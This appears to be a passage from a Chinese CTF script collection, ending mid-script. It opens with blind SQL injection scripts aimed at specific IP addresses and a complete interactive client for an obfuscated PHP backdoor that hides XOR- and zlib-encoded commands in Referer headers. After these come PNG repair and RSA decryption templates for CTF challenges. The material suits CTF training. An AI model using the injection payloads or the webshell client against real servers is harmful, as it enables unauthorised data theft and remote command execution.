username = "aa'\nor\n(select\nsubstring(welcometoourctf,"+str(i)+",1)\nfrom\nFlag)\nlike\n'"+guess+"'\nand\n''like'"
data = {"user.name": username, "user.password": admin_password}
req = requests.post(url, data=data, timeout=1000).text
if len(req)>5000:
flag = flag + guess
print "flag:" + flag
break
admin_password = first()
second(admin_password)

常见模板

1
2
3
4
5
6
7
8
9
10
import requests

for i in range(1,40):
for j in range(32,128):
url = "http://47.94.221.39:8004//index.php?id=3%20%df%27and%20(case%20when(ord(mid((select%20group_concat(flag)from%20flag)from%20{0}%20for%201))={1})%20then%20 1%20else%200%20end)%23"
res=requests.get(url.format(i,j))
if 'img' in res.text:
print(chr(j))

# flag{q22!sa_web_sql_2245y2g44}


php混淆攻击脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
# encoding: utf-8

from random import randint,choice
from hashlib import md5
import urllib
import string
import zlib
import base64
import requests
import re

def choicePart(seq,amount):
length = len(seq)
if length == 0 or length < amount:
print 'Error Input'
return None
result = []
indexes = []
count = 0
while count < amount:
i = randint(0,length-1)
if not i in indexes:
indexes.append(i)
result.append(seq[i])
count += 1
if count == amount:
return result

def randBytesFlow(amount):
result = ''
for i in xrange(amount):
result += chr(randint(0,255))
return result

def randAlpha(amount):
result = ''
for i in xrange(amount):
result += choice(string.ascii_letters)
return result

def loopXor(text,key):
result = ''
lenKey = len(key)
lenTxt = len(text)
iTxt = 0
while iTxt < lenTxt:
iKey = 0
while iTxt<lenTxt and iKey<lenKey:
result += chr(ord(key[iKey]) ^ ord(text[iTxt]))
iTxt += 1
iKey += 1
return result


def debugPrint(msg):
if debugging:
print msg

# config
debugging = False
keyh = "42f7" # $kh
keyf = "e9ac" # $kf
xorKey = keyh + keyf
url = 'http://111.198.29.45:44036/hack.php'
defaultLang = 'zh-CN'
languages = ['zh-TW;q=0.%d','zh-HK;q=0.%d','en-US;q=0.%d','en;q=0.%d']
proxies = None # {'http':'http://127.0.0.1:8080'} # proxy for debug

sess = requests.Session()

# generate random Accept-Language only once each session
langTmp = choicePart(languages,3)
indexes = sorted(choicePart(range(1,10),3), reverse=True)

acceptLang = [defaultLang]
for i in xrange(3):
acceptLang.append(langTmp[i] % (indexes[i],))
acceptLangStr = ','.join(acceptLang)
debugPrint(acceptLangStr)

init2Char = acceptLang[0][0] + acceptLang[1][0] # $i
md5head = (md5(init2Char + keyh).hexdigest())[0:3]
md5tail = (md5(init2Char + keyf).hexdigest())[0:3] + randAlpha(randint(3,8))
debugPrint('$i is %s' % (init2Char))
debugPrint('md5 head: %s' % (md5head,))
debugPrint('md5 tail: %s' % (md5tail,))

# Interactive php shell
cmd = raw_input('phpshell > ')
while cmd != '':
# build junk data in referer
query = []
for i in xrange(max(indexes)+1+randint(0,2)):
key = randAlpha(randint(3,6))
value = base64.urlsafe_b64encode(randBytesFlow(randint(3,12)))
query.append((key, value))
debugPrint('Before insert payload:')
debugPrint(query)
debugPrint(urllib.urlencode(query))

# encode payload
payload = zlib.compress(cmd)
payload = loopXor(payload,xorKey)
payload = base64.urlsafe_b64encode(payload)
payload = md5head + payload

# cut payload, replace into referer
cutIndex = randint(2,len(payload)-3)
payloadPieces = (payload[0:cutIndex], payload[cutIndex:], md5tail)
iPiece = 0
for i in indexes:
query[i] = (query[i][0],payloadPieces[iPiece])
iPiece += 1
referer = url + '?' + urllib.urlencode(query)
debugPrint('After insert payload, referer is:')
debugPrint(query)
debugPrint(referer)

# send request
r = sess.get(url,headers={'Accept-Language':acceptLangStr,'Referer':referer},proxies=proxies)
html = r.text
debugPrint(html)

# process response
pattern = re.compile(r'<%s>(.*)</%s>' % (xorKey,xorKey))
output = pattern.findall(html)
if len(output) == 0:
print 'Error, no backdoor response'
cmd = raw_input('phpshell > ')
continue
output = output[0]
debugPrint(output)
output = output.decode('base64')
output = loopXor(output,xorKey)
output = zlib.decompress(output)
print output
cmd = raw_input('phpshell > ')

js加密bytes转img脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/env python3
import itertools
from PIL import Image
import io
from pyzbar.pyzbar import decode


b = list(map(int, '230 231 15 119 0 207 252 10 223 255 236 181 64 109 202 199 107 239 234 62 13 133 240 114 73 122 212 133 52 83 96 205 110 80 249 71 0 121 249 65 0 157 103 12 174 4 68 11 98 0 215 114 119 0 183 217 1 69 216 220 73 94 95 13 137 0 95 2 55 10 166 64 84 0 125 116 0 232 106 213 0 16 195 223 40 0 68 181 2 0 255 11 155 66 48 255 164 115 23 233 81 73 231 133 189 120 78 68 145 72 75 195 64 132 157 64 13 18 0 51 16 31 0 13 89 192 170 130 10 203 46 140 98 57 26 102 131 52 0 0 15 77 243 82 201 255 78 175 252 172 1 65 137 194 156 237 239 110 156 108 63 118 1 227 145 191 68 195 102 243 192 71 64 116 101 227 59 68 0 179 129 53 120 213 250 65 180 168 102 154 124 71 235 180 70 173 23 86 64 249 197 70 126 152 252 188 91 150 135 95 51 75 223 249 80 110 243 103 206 59 169 93 55 174 61 241 113 127 85 112 62 237 217 114 146 58 30 99 169 206 243 207 248 194 79 51 82 102 129 73 107 102 17 99 226 191 219 82 17 16 231 249 60 222 226 69 211 239 231 222 121 214 29 206 212 196 125 6 109 73 64 60 114 45 229 231 235 156 73 209 126 85 229 229 21 86 176 201 127 179 127 128 125 143 61 126 125 38 239 252 6 255 12 149 131 1 40 31 98 230 243 174 195 213 57 84 93 35 162 84 155 126 146 244 154 166 108 124 107 250 230 99 176 66 30 151 212 49 121 125 149 7 114 13 9 18 36 252 214 228 86 114 115 229 179 120 108 95 80 127 3 31 37 102 249 203 29 141 74 55 127 107 69 249 100 213 111 249 106 88 174 255 214 9 171 244 185 21 167 116 157 124 248 94 156 153 132 142 235 160 40 1 113 17 180 238 254 117 104 253 90 67 71 2 208 115 207 249 226 246 9 251 248 120 39 57 149 42 187 216 202 105 194 56 198 147 149 211 164 201 218 126 154 250 39 60 225 138 142 73 248 75 210 250 177 182 90 234 249 175 89 24 202 151 15 229 157 196 39 244 207 251 156 1 80 128 78 134 146 173 57 203 202 68 124 241 252 67 65 144 122 181 211 199 26 137 251 174 131 125 46 227 135 238 108 174 202 187 157 227 95 67 139 117 228 118 65 218 255 66 38 168 131 23 143 119 228 80 54 98 255 178 13 17 149 174 109 193 214 156 48 181 242 247 205 198 66 202 246 227 138 134 74 230 207 231 62 99 252 223 115 126 136 144 190 231 18 109 252 16 211 199 248 214 8 183 71 217 126 57 130 190 1 68 239 103 240 85 204 205 252 87 175 74 113 202 222 87 71 36 248 124 163 24 223 63 51 111 207 143 233 53 164 174 178 9 214 223 148 239 11 223 249 188 253 73 38 43 19 231 25 239 90 29 115 231 231 105 217 201 235 113 196 67 30 167 82 113 151 52 178 199 101 157 249 202 117 185 42 180 74 212 162 150 6 54 222 127 76 0 87 142 63 41 159 247 254 225'.split(' ')))
png_header = '89504e470d0a1a0a0000000d49484452'
png_header = [png_header[i*2:(i+1)*2] for i in range(len(png_header) // 2)]
png_header = list(map(lambda x: int(x, 16), png_header))

LEN = 16
key = [None for _ in range(LEN)]

shifters = []

for i in range(LEN):
shifters_i = []
for shifter in range(10):
if b[(shifter * LEN) % len(b) + i] == png_header[i]:
shifters_i.append(shifter)

shifters.append(shifters_i)

def assemble_png(k):
result = [0 for _ in range(30000)]

for i in range(LEN):
shifter = ord(k[i]) - ord('0')
for j in range(len(b) // LEN):
result[(j * LEN) + i] = b[(((j + shifter) * LEN) % len(b)) + i]

i = len(result) - 1
while result[i] == 0:
i -= 1

result = result[:i + 1]

return result

valid_keys = []
print('{:<5}{:<20}{}'.format('#', 'Candidate', 'isValid?'))
for i, key_candidate in enumerate(itertools.product(*shifters)):
key_candidate = ''.join(map(str, key_candidate))

png_candidate = assemble_png(key_candidate)
f = io.BytesIO(bytes(png_candidate))

valid = False
try:
pilimage = Image.open(f)
valid = True
valid_keys.append(key_candidate)
except:
pass

print('{:<5}{:<20}{}'.format(i, key_candidate, valid))

print
for key in valid_keys:
f = io.BytesIO(bytes(assemble_png(key)))
pilimage = Image.open(f)
decoded = decode(pilimage)[0]

if 'picoCTF' in str(decoded.data):
print(str(decoded.data, 'utf-8'))

png图片修复

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
#!/usr/bin/env python

import argparse
import struct
import difflib
import binascii


def str_to_hex(s):
return ''.join(map(lambda x: '\\x{:02x}'.format(ord(x)), s))

def crc_to_hex(c):
c = hex(c)[2:]

return ''.join(map(lambda x: '\\x{}'.format(x), (c[2*i : 2*i + 2] for i in range(len(c) / 2))))
return ''.join(map(lambda x: '\\x{:02x}'.format(ord(x)), s))

def get_chunk_data(png, pos):
c_length = struct.unpack('>I', png[pos : pos + 4])[0]
c_type = png[pos + 4 : pos + 8]
c_data = png[pos + 8 : pos + 8 + c_length]
c_crc = png[pos + 8 + c_length : pos + 8 + c_length + 4]

c_size = 12 + c_length

return (c_length, c_type, c_data, c_crc, c_size)

def parse_IHDR(c_data):
width = struct.unpack('>I', c_data[:4][0])
height = struct.unpack('>I', c_data[4:8][0])
bit_depth = struct.unpack('>b', c_data[9:10][0])
compression_method = struct.unpack('>b', c_data[10:11][0])
filter_method = struct.unpack('>b', c_data[11:12][0])
interlace_method = struct.unpack('>b', c_data[12:13][0])

return (width, height, bit_depth, compression_method, filter_method, interlace_method)

def main():
png = open(args.png, 'r').read()

suggestions = []
suggestions_level = []
error_level = 0


# Check file header
png_header = map(chr, [0x89, 0x50, 0x4e, 0x47 ,0x0d, 0x0a ,0x1a ,0x0a])
if png[:8] != ''.join(png_header):
print 'Invalid file header:\n' + \
'\t' + ' '.join(p.encode('hex') for p in png[:8]) + ', should be:\n' + \
'\t' + ' '.join(p.encode('hex') for p in png_header)
error_level = 4
suggestions.append('printf "{}" | dd of={} bs=1 seek={} count={} conv=notrunc'.format(
str_to_hex(''.join(png_header)), args.png, 0, 8))
suggestions_level.append(4)

print
print 'Chunks:'

png_valid_headres = ['PLTE', 'IDAT', 'IEND',
'cHRM', 'gAMA','iCCP', 'sBIT', 'sRGB', 'bKGD', 'hIST', 'tRNS', 'pHYs', 'sPLT', 'tIME', 'iTXt', 'tEXt', 'zTXt']
parsed_chunks = []
c_id = 0
pos = 8

print '{:<6}{:<15}{:<15}{:<6}{:<15}{:<15}{}'.format('#', 'Start', 'Length', 'type', 'crc', 'size', 'info')

# Check chunks
OK = True
while OK:
try:
c_length, c_type, c_data, c_crc, c_size = get_chunk_data(png, pos)
except:
break

c_errors = []

if c_id == 0: # First chunk - IHDR
if c_type != 'IHDR':
c_errors.append('Invalid chunk type ({}), should be "{}"'.format(c_type, 'IHDR'))
error_level = max(error_level, 3)
suggestions.append('printf "IHDR" | dd of={} bs=1 seek={} count={} conv=notrunc'.format(args.png, pos+4, 4))
suggestions_level.append(3)
if c_length != 13:
c_errors.append('Invalid chunk length ({}), should be {}'.format(c_length, 13))
error_level = max(error_level, 2)
else:
if c_type not in png_valid_headres:
close_matches = difflib.get_close_matches(c_type, png_valid_headres, cutoff=0.3)
if close_matches != []:
c_errors.append('Invalid chunk type ({}), maybe you meant "{}"'.format(c_type, close_matches[0]))
error_level = max(error_level, 3)
suggestions.append('printf "{}" | dd of={} bs=1 seek={} count={} conv=notrunc'.format(close_matches[0], args.png, pos+4, 4))
suggestions_level.append(3)
else:
c_errors.append('Invalid chunk type ({})'.format(c_type))

if pos + c_length > len(png) - 12 and c_type != 'IEND':
c_errors.append('Invalid chunk length ({}), maximum is: {}'.format(c_length, len(png) - 12 - pos - 12))
error_level = max(error_level, 2)
suggestions.append('printf "{}" | dd of={} bs=1 seek={} count={} conv=notrunc'.format(
str_to_hex(struct.pack('>I', len(png) - 12 - pos - 12)),
args.png, pos, 4))
suggestions_level.append(2)

calculated_crc = binascii.crc32(c_type + c_data) % (1 << 32)
if c_crc != '{:08x}'.format(calculated_crc).decode('hex'):
# print '111\n', c_crc, calculated_crc, '111\n'
c_errors.append('CRC error ({}), should be: {}'.format(str_to_hex(c_crc), crc_to_hex(calculated_crc)))
error_level = max(error_level, 1)
suggestions.append('printf "{}" | dd of={} bs=1 seek={} count={} conv=notrunc'.format(
crc_to_hex(calculated_crc), args.png, pos + 8 + c_length, 4))
suggestions_level.append(1)
#print c_crc, type(c_crc)
#print str(binascii.crc32(c_type + c_data) % (1 << 32)).decode('hex'), type(str(binascii.crc32(c_type + c_data) % (1 << 32)).decode('hex'))
#print struct.pack('<i', binascii.crc32(c_type + c_data))
#print crc_to_hex(binascii.crc32(c_type + c_data) % (1 << 32)), type(crc_to_hex(binascii.crc32(c_type + c_data) % (1 << 32)))

parsed_chunks.append(c_type)

print '{:<6}{:<15}{:<15}{:<6}{:<15}{:<15}{}'.format(c_id, pos, c_length, c_type, c_crc.encode('hex'), c_size, ' | '.join(c_errors))

c_id += 1
pos += min(c_size, len(png) - 12 - pos)

if c_type == 'IEND':
OK = False

print
print 'Suggestions:'
# if error_level == 4:
# suggestions = filter(lambda x: 'Invalid file header' in x, suggestions)
# elif error_level == 3:
# suggestions = filter(lambda x: 'Invalid chunk type' in x, suggestions)
# elif error_level == 2:
# suggestions = filter(lambda x: 'Invalid chunk length' in x, suggestions)
# elif error_level == 1:
# suggestions = filter(lambda x: 'CRC error' in x, suggestions)

for i, (s, sl) in enumerate(zip(suggestions, suggestions_level)):
if sl == error_level:
print '{}'.format(s)

if error_level > 1:
print
print 'Please run the tool again after applying the corrections'

if __name__ == '__main__':
parser = argparse.ArgumentParser(description='PNG parser.')
parser.add_argument('png', type=str, help='corrupted png file')
parser.add_argument('-v', '--verbose', action='store_true', help='add verbosity')

args = parser.parse_args()
print args

main()

RSA解密脚本系列

rsa解密模板

以文本形式给出参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/usr/bin/env python3
# coding:utf-8
#power by jedi

import gmpy2
import binascii

n = 966808932627497190635859236054960349099463975227350564265384373280336699853387254070662881265937565163000758606154308757944030571837175048514574473061401566330836334647176655282619268592560172726526643074499534129878217409046045533656897050117438496357231575999185527675071002803951800635220029015932007465117818739948903750200830856115668691007706836952244842719419452946259275251773298338162389930518838272704908887016474007051397194588396039111216708866214614779627566959335170676055025850932631053641576566165694121420546081043285806783239296799795655191121966377590175780618944910532816988143056757054052679968538901460893571204904394975714081055455240523895653305315517745729334114549756695334171142876080477105070409544777981602152762154610738540163796164295222810243309051503090866674634440359226192530724635477051576515179864461174911975667162597286769079380660782647952944808596310476973939156187472076952935728249061137481887589103973591082872988641958270285169650803792395556363304056290077801453980822097583574309682935697260204862756923865556397686696854239564541407185709940107806536773160263764483443859425726953142964148216209968437587044617613518058779287167853349364533716458676066734216877566181514607693882375533
# p 和 q通过在线网站http://factordb.com/index.php分解
p = gmpy2.mpz(31093551302922880999883020803665536616272147022877428745314830867519351013248914244880101094365815998050115415308439610066700139164376274980650005150267949853671653233491784289493988946869396093730966325659249796545878080119206283512342980854475734097108975670778836003822789405498941374798016753689377992355122774401780930185598458240894362246194248623911382284169677595864501475308194644140602272961699230282993020507668939980205079239221924230430230318076991507619960330144745307022538024878444458717587446601559546292026245318907293584609320115374632235270795633933755350928537598242214216674496409625928797450473)
q = gmpy2.mpz(31093551302922880999883020803665536616272147022877428745314830867519351013248914244880101094365815998050115415308439610066700139164376274980650005150267949853671653233491784289493988946869396093730966325659249796545878080119206283512342980854475734097108975670778836003822789405498941374798016753689377992355122774401780930185598458240894362246194248623911382284169677595864501475308194644140602272961699230282993020507668939980205079239221924230430230318076991507619960330144745307022538024878444458717587446601559546292026245318907293584609320115374632235270795633933755350928537598242214216674496409625928997877221)
e = gmpy2.mpz(65537)
phi_n = (p-1)*(q-1)
d = gmpy2.invert(e, phi_n)
c = gmpy2.mpz(168502910088858295634315070244377409556567637139736308082186369003227771936407321783557795624279162162305200436446903976385948677897665466290852769877562167487142385308027341639816401055081820497002018908896202860342391029082581621987305533097386652183849657065952062433988387640990383623264405525144003500286531262674315900537001845043225363148359766771033899680111076181672797077410584747509581932045540801777738548872747597899965366950827505529432483779821158152928899947837196391555666165486441878183288008753561108995715961920472927844877569855940505148843530998878113722830427807926679324241141182238903567682042410145345551889442158895157875798990903715105782682083886461661307063583447696168828687126956147955886493383805513557604179029050981678755054945607866353195793654108403939242723861651919152369923904002966873994811826391080318146260416978499377182540684409790357257490816203138499369634490897553227763563553981246891677613446390134477832143175248992161641698011195968792105201847976082322786623390242470226740685822218140263182024226228692159380557661591633072091945077334191987860262448385123599459647228562137369178069072804498049463136233856337817385977990145571042231795332995523988174895432819872832170029690848)

m = pow(c, d, n)
print("十进制:\n%s"%m)
m_hex = hex(m)[2:]
print("十六进制:\n%s"%(m_hex,))
#print("ascII:\n%s"%((binascii.b2a_hex(hex(m)[2:])).decode('hex'),))
print("ascii:\n%s"%(binascii.a2b_hex(m_hex).decode("utf8"),))

以文件形式给出参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#/usr/bin/env python
#coding:utf-8
#power by jedi

from Crypto.PublicKey import RSA
import gmpy2
import rsa

#1.从公钥文件中分解n和e
public_key = RSA.importKey(open("./tmp/pubkey.pem").read())
n = public_key.n
e = public_key.e
#print("n=\n%s\ne=\n%s"%(n,e))

#2.在线分解n得到p和q
p = 275127860351348928173285174381581152299
q = 319576316814478949870590164193048041239

#3.计算出d
d = int(gmpy2.invert(e, (p-1)*(q-1)))
#print(d)

#通过已知条件,生成私钥,并解密密文
private_key = rsa.PrivateKey(n, e, d, p, q)#生成私钥
with open("./tmp/flag.enc") as f:
flag = rsa.decrypt(f.read(), private_key)
print(flag)
#print(rsa.decrypt(f.read(), private_key).decode())

e=65537(已知cepq求m)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import gmpy2
def Decrypt(c,e,p,q):
L=(p-1)*(q-1)
d=gmpy2.invert(e,L)
n=p*q
m=gmpy2.powmod(c,d,n)
flag=str(m)
print("flag{"+flag+"}")
if __name__ == '__main__':
p = 31093551302922880999883020803665536616272147022877428745314830867519351013248914244880101094365815998050115415308439610066700139164376274980650005150267949853671653233491784289493988946869396093730966325659249796545878080119206283512342980854475734097108975670778836003822789405498941374798016753689377992355122774401780930185598458240894362246194248623911382284169677595864501475308194644140602272961699230282993020507668939980205079239221924230430230318076991507619960330144745307022538024878444458717587446601559546292026245318907293584609320115374632235270795633933755350928537598242214216674496409625928997877221
q = 31093551302922880999883020803665536616272147022877428745314830867519351013248914244880101094365815998050115415308439610066700139164376274980650005150267949853671653233491784289493988946869396093730966325659249796545878080119206283512342980854475734097108975670778836003822789405498941374798016753689377992355122774401780930185598458240894362246194248623911382284169677595864501475308194644140602272961699230282993020507668939980205079239221924230430230318076991507619960330144745307022538024878444458717587446601559546292026245318907293584609320115374632235270795633933755350928537598242214216674496409625928797450473
e = 65537
c = 168502910088858295634315070244377409556567637139736308082186369003227771936407321783557795624279162162305200436446903976385948677897665466290852769877562167487142385308027341639816401055081820497002018908896202860342391029082581621987305533097386652183849657065952062433988387640990383623264405525144003500286531262674315900537001845043225363148359766771033899680111076181672797077410584747509581932045540801777738548872747597899965366950827505529432483779821158152928899947837196391555666165486441878183288008753561108995715961920472927844877569855940505148843530998878113722830427807926679324241141182238903567682042410145345551889442158895157875798990903715105782682083886461661307063583447696168828687126956147955886493383805513557604179029050981678755054945607866353195793654108403939242723861651919152369923904002966873994811826391080318146260416978499377182540684409790357257490816203138499369634490897553227763563553981246891677613446390134477832143175248992161641698011195968792105201847976082322786623390242470226740685822218140263182024226228692159380557661591633072091945077334191987860262448385123599459647228562137369178069072804498049463136233856337817385977990145571042231795332995523988174895432819872832170029690848
Decrypt(c,e,p,q)

共模攻击(已知n,e1,e2,c1,c2求m)

以文本形式给出参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#! /usr/bin/env python2
# -*- coding: utf-8 -*-

from libnum import n2s, s2n
from gmpy2 import invert

# 扩展欧几里得算法
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)


def main():
n = 116547141139745534253172934123407786743246513874292261984447028928003798881819567221547298751255790928878194794155722543477883428672342894945552668904410126460402501558930911637857436926624838677630868157884406020858164140754510239986466552869866296144106255873879659676368694043769795604582888907403261286211
c1 = 78552378607874335972488545767374401332953345586323262531477516680347117293352843468592985447836452620945707838830990843415342047337735534418287912723395148814463617627398248738969202758950481027762126608368555442533803610260859075919831387641824493902538796161102236794716963153162784732179636344267189394853
c2 = 98790462909782651815146615208104450165337326951856608832305081731255876886710141821823912122797166057063387122774480296375186739026132806230834774921466445172852604926204802577270611302881214045975455878277660638731607530487289267225666045742782663867519468766276566912954519691795540730313772338991769270201
e1 = 1804229351
e2 = 17249876309
s = egcd(e1, e2)
s1 = s[1]
s2 = s[2]
# 求模反元素
if s1 < 0:
s1 = - s1
c1 = invert(c1, n)
elif s2 < 0:
s2 = - s2
c2 = invert(c2, n)

m = pow(c1, s1, n) * pow(c2, s2, n) % n
print(n2s(m)) # 二进制转string


if __name__ == '__main__':
main()

以文件形式给出参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/python
# coding=utf-8
# 文件类型
import string
import gmpy


def egcd(a, b):
if a == 0:
return b, 0, 1
else:
g, y, x = egcd(b % a, a)
return g, x - b // a * y, y


def main():
with open('flag.enc1', 'r') as f1:
c1 = f1.read().encode('hex')
c1 = string.atoi(c1, base=16)

with open('flag.enc2', 'r') as f2:
c2 = f2.read().encode('hex')
c2 = string.atoi(c2, base=16)

n = 0x00b0bee5e3e9e5a7e8d00b493355c618fc8c7d7d03b82e409951c182f398dee3104580e7ba70d383ae5311475656e8a964d380cb157f48c951adfa65db0b122ca40e42fa709189b719a4f0d746e2f6069baf11cebd650f14b93c977352fd13b1eea6d6e1da775502abff89d3a8b3615fd0db49b88a976bc20568489284e181f6f11e270891c8ef80017bad238e363039a458470f1749101bc29949d3a4f4038d463938851579c7525a69984f15b5667f34209b70eb261136947fa123e549dfff00601883afd936fe411e006e4e93d1a00b0fea541bbfc8c5186cb6220503a94b2413110d640c77ea54ba3220fc8f4cc6ce77151e29b3e06578c478bd1bebe04589ef9a197f6f806db8b3ecd826cad24f5324ccdec6e8fead2c2150068602c8dcdc59402ccac9424b790048ccdd9327068095efa010b7f196c74ba8c37b128f9e1411751633f78b7b9e56f71f77a1b4daad3fc54b5e7ef935d9a72fb176759765522b4bbc02e314d5c06b64d5054b7b096c601236e6ccf45b5e611c805d335dbab0c35d226cc208d8ce4736ba39a0354426fae006c7fe52d5267dcfb9c3884f51fddfdf4a9794bcfe0e1557113749e6c8ef421dba263aff68739ce00ed80fd0022ef92d3488f76deb62bdef7bea6026f22a1d25aa2a92d124414a8021fe0c174b9803e6bb5fad75e186a946a17280770f1243f4387446ccceb2222a965cc30b3929L

e1 = 17
e2 = 65537
s = egcd(e1, e2)
s1 = s[1]
s2 = s[2]

# 求模反元素
if s1 < 0:
s1 = -s1
c1 = gmpy.invert(c1, n)
elif s2 < 0:
s2 = -s2
c2 = gmpy.invert(c2, n)

m = pow(c1, s1, n) * pow(c2, s2, n) % n
print '{:x}'.format(int(m)).decode('hex')
if __name__ == '__main__':
main()

已知n,e,c求m

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# coding = utf-8
import libnum
def fastExpMod(b, e, m):
"""
e = e0*(2^0) + e1*(2^1) + e2*(2^2) + ... + en * (2^n)

b^e = b^(e0*(2^0) + e1*(2^1) + e2*(2^2) + ... + en * (2^n))
= b^(e0*(2^0)) * b^(e1*(2^1)) * b^(e2*(2^2)) * ... * b^(en*(2^n))

b^e mod m = ((b^(e0*(2^0)) mod m) * (b^(e1*(2^1)) mod m) * (b^(e2*(2^2)) mod m) * ... * (b^(en*(2^n)) mod m) mod m
"""
result = 1
while e != 0:
if (e&1) == 1:
# ei = 1, then mul
result = (result * b) % m
e >>= 1
# b, b^2, b^4, b^8, ... , b^(2^n)
b = (b*b) % m
return result


def decryption(C, d, n):
#RSA M = C^d mod n
return fastExpMod(C, d, n)

p = 13574881
q = 23781539
n = p * q
fn = (p - 1) * (q - 1)
e = 23
d = libnum.invmod(e,fn)
print d
C = int('0xdc2eeeb2782c', 16)
M = decryption(C, d, n)
flag = str(hex(M))[2:-1]
print flag.decode('hex')

已知n,c,e=1

文本形式给出参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#/usr/bin/env python3
#coding:utf-8
import binascii
import gmpy2
N_hex=0x180be86dc898a3c3a710e52b31de460f8f350610bf63e6b2203c08fddad44601d96eb454a34dab7684589bc32b19eb27cffff8c07179e349ddb62898ae896f8c681796052ae1598bd41f35491175c9b60ae2260d0d4ebac05b4b6f2677a7609c2fe6194fe7b63841cec632e3a2f55d0cb09df08eacea34394ad473577dea5131552b0b30efac31c59087bfe603d2b13bed7d14967bfd489157aa01b14b4e1bd08d9b92ec0c319aeb8fedd535c56770aac95247d116d59cae2f99c3b51f43093fd39c10f93830c1ece75ee37e5fcdc5b174052eccadcadeda2f1b3a4a87184041d5c1a6a0b2eeaa3c3a1227bc27e130e67ac397b375ffe7c873e9b1c649812edcd
e_hex=0x1
c_hex=0x4963654354467b66616c6c735f61706172745f736f5f656173696c795f616e645f7265617373656d626c65645f736f5f63727564656c797d

c_hex = gmpy2.mpz(c_hex)
N_hex = gmpy2.mpz(N_hex)

i = 0
while i<10:
m_hex = hex(c_hex + gmpy2.mpz(hex(i))*N_hex)
print(m_hex[2:])
try:
print(binascii.a2b_hex(m_hex[2:]).decode("utf8"))
except binascii.Error as e:
print("位数非偶数,跳过...")
i += 1

已知p,q,e=2

以文件形式给出参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/usr/bin/python
# coding=utf-8
# 适合e=2
import gmpy
import string
from Crypto.PublicKey import RSA

# 读取公钥参数
with open('./tmp/pubkey.pem', 'r') as f:
key = RSA.importKey(f)
N = key.n
e = key.e

p = 275127860351348928173285174381581152299
q = 319576316814478949870590164193048041239
with open('./tmp/flag.enc', 'r') as f:
cipher = f.read().encode('hex')
cipher = string.atoi(cipher, base=16)
# print cipher

# 计算yp和yq
yp = gmpy.invert(p,q)
yq = gmpy.invert(q,p)

# 计算mp和mq
mp = pow(cipher, (p + 1) / 4, p)
mq = pow(cipher, (q + 1) / 4, q)

# 计算a,b,c,d
a = (yp * p * mq + yq * q * mp) % N
b = N - int(a)
c = (yp * p * mq - yq * q * mp) % N
d = N - int(c)

for i in (a,b,c,d):
s = '%x' % i
if len(s) % 2 != 0:
s = '0' + s
print s.decode('hex')

低加密指数e=3

以文件形式给出参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/usr/bin/env python
#coding:utf-8

import gmpy2
from Crypto.PublicKey import RSA

public_key = "./tmp/pubkey.pem"
cipher_file = "./tmp/flag.enc"

#读入公钥
with open(public_key, "r") as f:
key = RSA.importKey(f)
n = key.n
e = key.e

#读入密文
with open(cipher_file, "r") as f:
cipher = f.read().encode("hex")
cipher = int(cipher, 16)
#print(cipher)

#破解密文
def get_flag():
i = 0
while True:
if(gmpy2.iroot(cipher+i*n, 3)[1] == True):
flag_bin = int(gmpy2.iroot(cipher+x*n, 3)[0])
flag = hex(flag_bin)[2:-1].decode("hex")
print(flag)
break
i += 1

def get_flag_for():
for x in xrange(118600000, 118720000):
if(gmpy2.iroot(cipher+x*n, 3)[1] == 1):
flag_bin = int(gmpy2.iroot(cipher+x*n, 3)[0])
flag = hex(flag_bin)[2:-1].decode("hex")
print(flag)
break

if __name__ == "__main__":
get_flag_for()
#get_flag()

利用openssl解密(已知pubkey.pem和flag.enc)

1
2
3
4
# 转换pem为ne格式
openssl rsa -pubin -text -modulus -in pubkey.pem
# 使用私钥解密
openssl rsautl -decrypt -in flag.enc -inkey private.pem -out flag.dec

分解pqd后用脚本解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# coding=utf-8
import math
import sys
